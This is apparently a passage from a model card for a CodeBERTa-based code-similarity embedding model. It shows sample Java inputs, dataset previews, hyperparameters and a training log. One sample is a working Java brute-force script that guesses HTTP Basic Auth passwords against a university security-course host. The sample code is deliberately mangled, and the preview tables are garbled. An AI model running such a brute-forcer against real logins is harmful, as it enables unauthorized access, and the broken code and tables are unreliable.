\n\n String str;\n String strImage = "";\n String 
strImageArray[];\n String strInputFromFile = "";\n String strSearchString = "<img src";\n\n boolean boolContinue = true;\n\n int intImageCounter = 0;\n int intStartSearch = 0;\n\n char ch;\n\n\n\n\n\n strImageArray = new String[1000];\n\n\n\n \n \n try\n {\n\n BufferedReader file =\n new BufferedReader(new FileReader(inputFile));\n\n\n while ( (str = file.readLine()) != null)\n {\n strInputFromFile += str;\n }\n\n file.print();\n file = null;\n\n }\n\n catch (Exception e)\n {\n boolContinue = false;\n System.err.println(e); \n }\t\n\n\n\n if (boolContinue)\n {\n\n strInputFromFile = (strInputFromFile.toLowerCase()).trim();\n\n intStartSearch = strInputFromFile.indexOf(strSearchString, intStartSearch);\n\n\n while (intStartSearch != -1)\n {\n\n intStartSearch += 8;\n\n while ( (strInputFromFile.charAt(intStartSearch) == \' \') ||\n (strInputFromFile.charAt(intStartSearch) == \'=\') ||\n (strInputFromFile.charAt(intStartSearch) == \'\\"\') )\n {\n intStartSearch++; \n }\n\n while ((strInputFromFile.charAt(intStartSearch) != \'\\"\')) \n {\n\n ch = strInputFromFile.charAt(intStartSearch);\n\n strImage += String.valueOf(ch);\n intStartSearch++;\n\n }\n\n\n if (strImage.startsWith("/"))\n strImage = prePend + strImage; \n\n\n intImageCounter++;\n strImageArray[intImageCounter - 1] = strImage;\n\n strImage = "";\n\n intStartSearch = strInputFromFile.indexOf(strSearchString, intStartSearch);\n\n }\n\n\n if (inputFile.equals(strWebPageOutputFile01)) \n { \n writeTextArrayToFile(strImageArray, \n strImageOutputFile01,\n intImageCounter);\n }\n else if (inputFile.equals(strWebPageOutputFile02)) \n { \n writeTextArrayToFile(strImageArray, \n strImageOutputFile02,\n intImageCounter);\n }\n\n\n }\n\n }\n\n\n\n\n\n\n\n static void downloadImages(String ImageOutputFile)\n \n {\n\n Process p;\n\n String str;\n String strFileName;\n\n\n\n try \n {\n\n BufferedReader file =\n new BufferedReader(new FileReader(ImageOutputFile));\n\n\n\n while ( (str = file.readLine()) != null)\n 
{\n\n strFileName = getImageFileName(str);\n\n System.out.println(" " + str);\n System.out.println(" file name: " + strFileName); \n\n\n if (fileExists(strFileName))\n deleteFile(strFileName);\n\n\n p = Runtime.getRuntime().exec("wget " + str);\n p.waitFor();\t\n\n }\n\n\n file = null;\n\n }\n\n catch (Exception e)\n {\n System.err.println("downloadingImages: " + e);\n }\n\n }\n\n\n\n\n\n\n\n static String getImageFileName(String imageFileName)\n \n {\n\n \n \n \n\n String strFileName;\n\n int intFileNameLength = imageFileName.length(); \n int intStartPosOfFileName = intFileNameLength - 1;\n\n\n\n\n \n \n while ( (intStartPosOfFileName >= 0) && \n (imageFileName.charAt(intStartPosOfFileName) != \'/\') )\n {\n intStartPosOfFileName--; \n }\n\n\n strFileName = imageFileName.substring(intStartPosOfFileName + 1, \n intFileNameLength);\n\n\n return strFileName;\n\n }\n\n\n\n\n\n\n\n static void writeTextArrayToFile(String strTextArray[],\n String strWriteToThisFileName,\n int numberOfImages )\n \n {\n\n boolean boolFirstLineWritten = false;\n\n\n\n try\n {\n\n File newFile = new File(strWriteToThisFileName);\n\n if (newFile.exists())\n {\n newFile.delete();\n }\n\n\n BufferedWriter toFile =\n new BufferedWriter(new FileWriter(newFile,\n false));\n\n for ( int i = 0 ; i < numberOfImages ; i++ )\n {\n\n if (boolFirstLineWritten) \n toFile.newLine();\n else\n boolFirstLineWritten = true;\n \n\n toFile.write(strTextArray[i]);\n\n }\n\n\n toFile.print();\n toFile = null;\n newFile = null;\n\n }\n\n catch(Exception e)\n {\n System.err.println(e.toString());\n System.out.println("File write problem for \'" + \n strWriteToThisFileName +\n "\'."); \n }\n\n }\n\n\n\n\n\n\n\n static boolean fileExists(String strFileName)\n \n {\n\n boolean boolReturnValue;\n File aFile = new File(strFileName);\n\n\n if (aFile.exists())\n boolReturnValue = true;\n else\n boolReturnValue = false;\n \n\n aFile = null;\n\n\n return boolReturnValue;\n\n }\n\n\n\n\n\n\n\n static void deleteFile(String 
strFileName)\n \n {\n\n\n if (fileExists(strFileName))\n { \n File aFile = new File(strFileName);\n\n try\n {\n aFile.delete();\n }\n\n catch (Exception e)\n {\n System.err.println(e);\n }\n\n\n aFile = null;\n\n }\n\n }\n\n\n\n\n\n\n\n static void renameFile(String strFromFileName, String strToFileName)\n \n {\n\n\n File from = new File(strFromFileName);\n File to = new File(strToFileName);\n\n\n boolean success = from.renameTo();\n\n\n from = null;\n to = null;\n\n }\n\n\n\n\n\n\n\n static getFileSize(String strFileName)\n \n {\n\n lngReturnValue;\n\n\n\n File file = new File(strFileName);\n \n lngReturnValue = file.length();\n\n file = null;\n\n\n return lngReturnValue;\n\n }\n\n\n\n\n\n\n\n static void sendMailWithDetectedChanges()\n \n {\n\n String str;\n String strInputFromFile = null;\n\n\n\n try \n { \n\n\n BufferedReader fromFile =\n new BufferedReader(new FileReader(strWatchDogDiffFile_01_02));\n\n\n while ( (str = fromFile.readLine()) != null)\n {\n strInputFromFile += str;\n }\n\n fromFile.print();\n fromFile = null;\n\n\n \n \n \n SmtpClient smtp = new SmtpClient(); \n\n \n \n smtp.from(strFromEmail); \n\n \n \n smtp.to(strToEmail); \n\n \n \n PrintStream msg = smtp.startMessage(); \n\n \n \n msg.println(": " + strToEmail); \n\n \n \n msg.println("From: " + strFromEmail); \n msg.println("Subject: Change in website content\\n"); \n msg.println(strInputFromFile); \n\n \n \n \n smtp.closeServer(); \n\n } \n\n catch (IOException e) \n {\n System.err.println(e); \n } \n\n }\n\n}',
'import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\nclass BruteForce {\n\n String password="";\n\n int num =401;\n\n\n public static void main (String[] args) {\n\n String str="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n\n BruteForce URLcon;\n\n int length = 0;\n\n String passwd="";\n\n int t0,t1;\n\n \n if (args.length == 0) {\n \t\n \tSystem.err.println (\n \t\t\n \t\t"Usage : java BruteForce <username>");\n \treturn;\n \t\n \t}\n String username = args[0];\n \n\n t0=System.currentTimeMillis();\n\n System.out.println (" " + new Date());\n \n System.out.println ("Using BruteForce method attack "+username+"\'s password.Please waiting.......");\n\n for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \tSystem.out.println("It took "+ DecimalFormat.getInstance().format(dt/1000)+ " seconds.");\n\n System.out.println ("Finish " + new Date());\n \n \treturn;\n\n }\n\n for (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n\n double dt =t1-t0;\n\n\n\n System.out.println("It took "+ DecimalFormat.getInstance().format(dt/1000)+ " seconds.");\n System.out.println ("Finish " + new Date());\n \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n\n \t double dt =t1-t0;\n\n\n\n \tSystem.out.println("It took "+DecimalFormat.getInstance().format(dt/1000)+ " seconds.");\n \n System.out.println 
("Finish " + new Date());\n \n \t return;\n\n }\n\n\n }\n\n}\n}\n System.out.println(" not find the password");\n\n}\n\n public BruteForce (String password, String username){\n\n \t String urlString = "http://sec-crack.cs.rmit.edu./SEC/2/" ;\n\n \n\n try {\n\n String userPassword = username+":"+password ;\n\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection) url.openConnection();\n\n uc.setRequestProperty ("Authorization", " " + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n catch(MalformedURLException e){\n \t System.out.println(e);\n }catch(IOException e){\n System.out.println(e);\n }\n\n\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
import java.io.; |
0 |
import java.util.; |
"+ hash2); BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt")); String line=" " ; String line1=" " ; String line2=" "; String line3=" "; String[] cad = new String[10]; executes("./.sh"); int i=0; while ((line = buf.readLine()) != null) { line1="http://www.cs.rmit.edu./students/images"+line; if (i==1) line2="http://www.cs.rmi... |
0 |
|
|
SoftmaxLoss

Columns: label, text_1, and text_2

| | label | text_1 | text_2 |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
import java.io.; |
|
0 |
|
|
SoftmaxLoss

Non-default hyperparameters:

- eval_strategy: steps
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- num_train_epochs: 1
- warmup_ratio: 0.1
- fp16: True

All hyperparameters:

- overwrite_output_dir: False
- do_predict: False
- eval_strategy: steps
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1.0
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.1
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: True
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: proportional

| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.0933 | 0.0279 |
| 0.1064 | 200 | 0.0154 | 0.0213 |
| 0.1596 | 300 | 0.0269 | 0.0245 |
| 0.2128 | 400 | 0.0189 | 0.0203 |
| 0.2660 | 500 | 0.0245 | 0.0205 |
| 0.3191 | 600 | 0.006 | 0.0233 |
| 0.3723 | 700 | 0.0192 | 0.0205 |
| 0.4255 | 800 | 0.0198 | 0.0194 |
| 0.4787 | 900 | 0.0252 | 0.0182 |
| 0.5319 | 1000 | 0.0167 | 0.0166 |
| 0.5851 | 1100 | 0.0102 | 0.0185 |
| 0.6383 | 1200 | 0.0175 | 0.0158 |
| 0.6915 | 1300 | 0.0174 | 0.0159 |
| 0.7447 | 1400 | 0.0145 | 0.0148 |
| 0.7979 | 1500 | 0.0104 | 0.0153 |
| 0.8511 | 1600 | 0.0309 | 0.0141 |
| 0.9043 | 1700 | 0.0041 | 0.0152 |
| 0.9574 | 1800 | 0.0129 | 0.0145 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
huggingface/CodeBERTa-small-v1